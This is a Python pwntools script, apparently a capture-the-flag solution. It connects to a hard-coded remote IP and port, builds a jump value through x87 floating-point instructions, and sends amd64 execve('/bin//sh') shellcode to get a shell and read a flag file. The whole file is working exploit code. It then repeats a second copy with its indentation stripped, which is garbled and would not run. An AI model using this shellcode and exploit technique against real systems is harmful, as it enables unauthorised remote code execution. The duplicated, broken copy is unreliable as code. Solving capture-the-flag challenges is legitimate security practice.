dfyz/shellcoder.py

## shellcoder.py
from pwn import *


# padding; push 0; ret
TARGET = int.from_bytes(b'\x00\x00\x6a\x00\xc3', byteorder='little')
PROMPT = b': '
SHELLCODE = r'''
    xor eax, eax
    xor rdx, rdx
    xor rsi, rsi
    movabs rbx, 0x68732f2f6e69622f
    push rbx
    push rsp
    pop rdi
    mov al, 0x3b
    syscall
'''


with remote('3.38.149.80', 20001) as tube:
    def run_x87(cmd):
        full_cmd = flat(b'\x90\x90', cmd)
        tube.sendlineafter(PROMPT, full_cmd.hex().encode())

    load_one = lambda: run_x87(b'\xd9\xe8') # fld1
    double = lambda: run_x87(b'\xd8\xc0')   # fadd st0, st0
    add_one = lambda: run_x87(b'\xd8\xc1')  # fadd st0, st1

    load_one()
    load_one()
    for bit in range(TARGET.bit_length() - 2, -1, -1):
        double()
        if TARGET & (1 << bit):
            add_one()

    tube.sendlineafter(PROMPT, flat(
        asm(SHELLCODE, arch='amd64'),
        b'\xdf\x38' # fistp qword ptr [rax]
    ).hex().encode())

    tube.sendline(b'cat flag')
    print(tube.recvline())
	from pwn import *


	# padding; push 0; ret
	TARGET = int.from_bytes(b'\x00\x00\x6a\x00\xc3', byteorder='little')
	PROMPT = b': '
	SHELLCODE = r'''
	xor eax, eax
	xor rdx, rdx
	xor rsi, rsi
	movabs rbx, 0x68732f2f6e69622f
	push rbx
	push rsp
	pop rdi
	mov al, 0x3b
	syscall
	'''


	with remote('3.38.149.80', 20001) as tube:
	def run_x87(cmd):
	full_cmd = flat(b'\x90\x90', cmd)
	tube.sendlineafter(PROMPT, full_cmd.hex().encode())

	load_one = lambda: run_x87(b'\xd9\xe8') # fld1
	double = lambda: run_x87(b'\xd8\xc0') # fadd st0, st0
	add_one = lambda: run_x87(b'\xd8\xc1') # fadd st0, st1

	load_one()
	load_one()
	for bit in range(TARGET.bit_length() - 2, -1, -1):
	double()
	if TARGET & (1 << bit):
	add_one()

	tube.sendlineafter(PROMPT, flat(
	asm(SHELLCODE, arch='amd64'),
	b'\xdf\x38' # fistp qword ptr [rax]
	).hex().encode())

	tube.sendline(b'cat flag')
	print(tube.recvline())